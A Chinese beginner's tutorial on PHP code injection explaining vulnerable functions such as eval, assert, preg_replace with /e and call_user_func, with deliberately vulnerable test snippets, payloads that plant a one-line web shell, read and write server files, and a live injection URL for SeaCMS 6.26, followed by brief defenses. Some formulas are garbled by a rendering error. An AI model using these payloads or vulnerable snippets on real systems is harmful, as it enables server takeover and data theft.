代码注入(web安全入门)

2022-12-30 22:45:43 浏览数 (1)

一、原理以及成因

php 代码执行(注入)是指应用程序过滤不严,用户可以 http 通过请求将代码注入到应用中执行。

代码执行(注入)类似于 SQL 注入漏洞,SQLi 是将 SQL 语句注入到数据库中执行,而代码执行则是可以把代码注入到应用中最终由服务器运行它。这样的漏洞如果没有特殊的过滤,相当于直接有一个 Web 后门的存在。

1、程序中含有可以执行 PHP 代码的函数或者语言结构

2、传入第一点中的参数,客户端可控,直接修改或者影响

二、漏洞危害

Web 应用如果存在代码执行漏洞是一件非常可怕的事情,就像一个人没有穿衣服,赤裸裸的暴露在光天化日之下。可以通过代码执行漏洞继承 Web 用户权限,执行任意代码。如果服务器没有正确的配置,Web 用户权限比较高的话,我们可以读写目标服务器任意文件内容,甚至可控制整个网站以及服务器。

本课程以 PHP 为例子来说明,代码执行漏洞。

PHP 中有很多函数和语句都会造成 PHP 代码执行漏洞。

三、相关函数和语句

3.1 eval()

eval() 会将字符串当作 PHP 代码来执行。测试代码如下

代码语言:javascript复制
<?php if(isset($_REQUEST['code'])){ @$str=$_REQUEST['code']; eval($str);
}else{
echo "Please submit code!<br/>?code=phpinfo();"
}

代码语言:javascript复制
<?php if(isset($_GET['code'])){ @$str=$_GET['code']; eval($str);
}else{
echo "Please submit code!<br/>?code=phpinfo();"
}

提交变量[?code=phpinfo();] 我们提交以下参数也是可以的[?code=${phpinfo()};]

[?code=1;phpinfo();] //可以执行多条语句

3.2 assert()

assert() 同样会作为 PHP 代码执行测试代码如下

代码语言:javascript复制
<?php if(isset($_GET['code'])){ @$str=$_GET['code']; assert($str);
}else{
echo "Please submit code!<br/>?code=phpinfo();"
}

提交参数 [?code=phpinfo()]

3.3 preg_replace()

preg_replace() 函数作用是对字符串进行正则处理,参数和返回值如下

mixed preg_replace(mixed $pattern,mixed $replacement,mixed KaTeX parse error: Expected 'EOF', got '&' at position 30: …imit = -1[,int &̲count]])

这段代码的含义是搜索s u b j e c t 中匹配 subject 中匹配subject中匹配pattern 的部分,以$replacement 进行替换,而

p a t t e r n 处,及第一个参数存在 e 修饰时, pattern 处,及第一个参数存在 e 修饰时,pattern处,及第一个参数存在e修饰时,replacement 的值会被当成 PHP 代码来执行。典型的代码如下

代码语言:javascript复制
<?php if(isset($_GET['code'])){ @$str=$_GET['code'];
preg_replace('/[(.*)]/e','\1',$str);
}else{
echo "Please submit code!<br/>?code=phpinfo();"
}

提交参数[?code=[phpinfo()]], phpinfo() 会被执行

3.4 call_user_func()

call_user_func() 等函数都有调用其他函数的功能,其中一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用以外的函数来执行我们想要的代码,也就是存在任意代码执行漏洞。

以 call_user_func() 为例子,该函数的第一个参数作为回调函数,测试代码如下

代码语言:javascript复制
<?php if(isset($_GET['fun'])){
$fun=$_GET['fun'];
$para=$_GET['para']; call_user_func($fun,$para);
}
?>

四、漏洞利用

代码执行漏洞的利用方式有很多中

4.1 直接获取shell

提交参数[?code=@eval($_REQUEST[1])],即可构成一句话木马,密码为 1。可以使用菜刀或者蚁剑连接

4.2 获取当前文件的绝对路径

FILE 是 PHP 预定义常量,其含义为当前文件的路径。提交代码[?code=print(FILE);]

4.3 读文件

我们可以利用 file_get_contents() 函数读取服务器任意文件,前提是知道文件的绝对路径(也可是相对路径)和读取权限。

提交代码[?code=var_dump(file_get_contents(‘c:windowssystem32driversetchosts’));] 右键查看源代码

4.4 写文件

我们可以利用 file_put_contents() 函数写入文件,前提是知道可写文件目录。提交代码[?code=var_dump(file_put_contents(P O S T [ 1 ] , _POST[1],

P

OST[1],_POST[2]));]

此时需要借助与 hackbar 通过 post 方式提交参数

[1=shel.php&2=<?php phpinfo()?>]

即可再当前目录下创建一个文件 shell.php

五、防御方法

1、尽量不要使用 eval(不是函数,是语言结构) 等函数

2、如果使用的话一定要进行严格的过滤3、preg_replace 放弃使用/e 修饰符

4、修改配置文件 php.ini disable_functions=assert

实战:

海洋 Seacmsv6.26 系统存在代码注入漏洞

漏洞点[/search.php?searchtype=5&tid=&area=phpinfo()]

6.53 6.54 6.55 都存在代码注入漏洞

0 人点赞